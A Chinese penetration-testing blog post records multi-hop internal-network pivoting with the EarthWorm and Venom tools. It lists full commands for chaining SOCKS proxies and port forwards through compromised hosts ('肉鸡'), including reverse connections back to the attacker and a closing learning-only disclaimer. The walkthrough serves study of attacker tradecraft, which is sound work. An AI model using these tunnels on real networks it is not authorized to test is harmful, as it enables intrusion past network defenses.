记录EarthWorm和Venom内网穿透

记录一次EarthWorm和Venom内网穿透(socke代理+端口转发)
EarthWorm(EW)

网络结构如下:

二层代理(1)

attack————>tager1————>tager2

tager1

./ew -s lcx_tran -l 1080 -f 2.2.2.129 -g 1111
-l     本地监听端口——供上一级连接
-f     下一级肉鸡ip
-g     下一级肉鸡监听的端口

tager2

./ew -s ssocksd  -l 2222
-l     本地监听端口——供上一级连接

二层代理(2)

attack<————>tager1(端口转发)<————>tager2

attack

./ew -s lcx_listen -l 1080 -e 8888
-l     本地监听端口——供上一级连接
-e     本地监听端口——供下一级肉鸡连接

tager1

./ew -s lcx_slave  -d 1.1.1.128 -e 8888 -f 2.2.2.129 -g 9999
-d     上一级ip
-e     上一级开放的端口
-f     下一级肉鸡ip
-g     下一级肉鸡ip监听的端口

tager2

./ew -s ssocksd -l 9999
-l     本地监听端口——供上一级连接

三层代理

attack<————>tager1<————>tager2<————>tager3

attack

./ew -s lcx_listen -l 1080 -e 8888
-l     本地监听端口——对外接口
-e     本地监听端口——供下一级肉鸡连接

tager1

./ew -s lcx_slave  -d 1.1.1.128 -e 8888 -f 2.2.2.129 -g 2222
-d     上一级ip
-e     上一级开放的端口
-f     下一级肉鸡ip
-g     下一级肉鸡ip监听的端口

tager2

./ew -s lcx_listen -l 2222 -e 3333
-l     本地监听端口——供上一级连接
-e     本地监听端口——供下一级肉鸡连接

tager3

./ew -s rssocks -d 3.3.3.128 -e 3333
-d     上一级ip
-e     上一级开放的端口

 

建立与各肉鸡的连接

attack<————tager1————>tager2<————tager3

attack

./admin -lport 9999
-lport     本地监听端口

tager1

./agent -rhost 1.1.1.128 -rport 9999
-rhost     远端ip地址
-rport     远端监听端口

tager2

./agent -lport 2222
-lport     本地监听端口
attack
show        //查看节点地图
goto 1      //进入节点1——对节点1进行控制
connect 2.2.2.129 2222      //连接肉鸡2.2.2.129:2222

tager3

./agent -rhost 3.3.3.128 -rport 2222
-rhost     远端ip地址
-rport     远端监听端口

开启socke5代理到肉鸡

tager1

attack
goto 1       //进入节点1——对节点1进行控制
socks 1111  //开启socke5代理,本地端口为1111

attack上的浏览器代理设置为socke5 127.0.0.1:1111

tager3

attack
goto 3       //进入节点3——对节点3进行控制
socks 3333  //开启socke5代理,本地端口为3333

attack上的浏览器代理设置为socke5 127.0.0.1:3333

端口转发

lforward   把本地可以访问的某个ip的端口映射到远端肉鸡上

attack
goto 2       //进入节点2——对节点2进行控制
lforward 127.0.0.1 22 3333      // 把本地22端口映射到节点的3333端口

在tager2上尝试运行

ssh attack@127.0.0.1 3333

rforward   把远端肉鸡可访问的某个ip的端口映射到本地

attack
goto 3       //进入节点3——对节点3进行控制
rforward 7.7.7.1 8080 3333      //把远端7.7.7.1:8080映射到本地的3333端口

attack上的浏览器访问127.0.0.1:3333

以上就是蓝域白帽网记录的一次EarthWorm和Venom内网穿透(socke代理+端口转发)EarthWorm(EW)

如果您喜欢本篇文章请带上本文链接哦:http://www.yemogege.cn/wzaq-stwz/354.html

版权保护: 本文由admin所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stwz/354.html

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图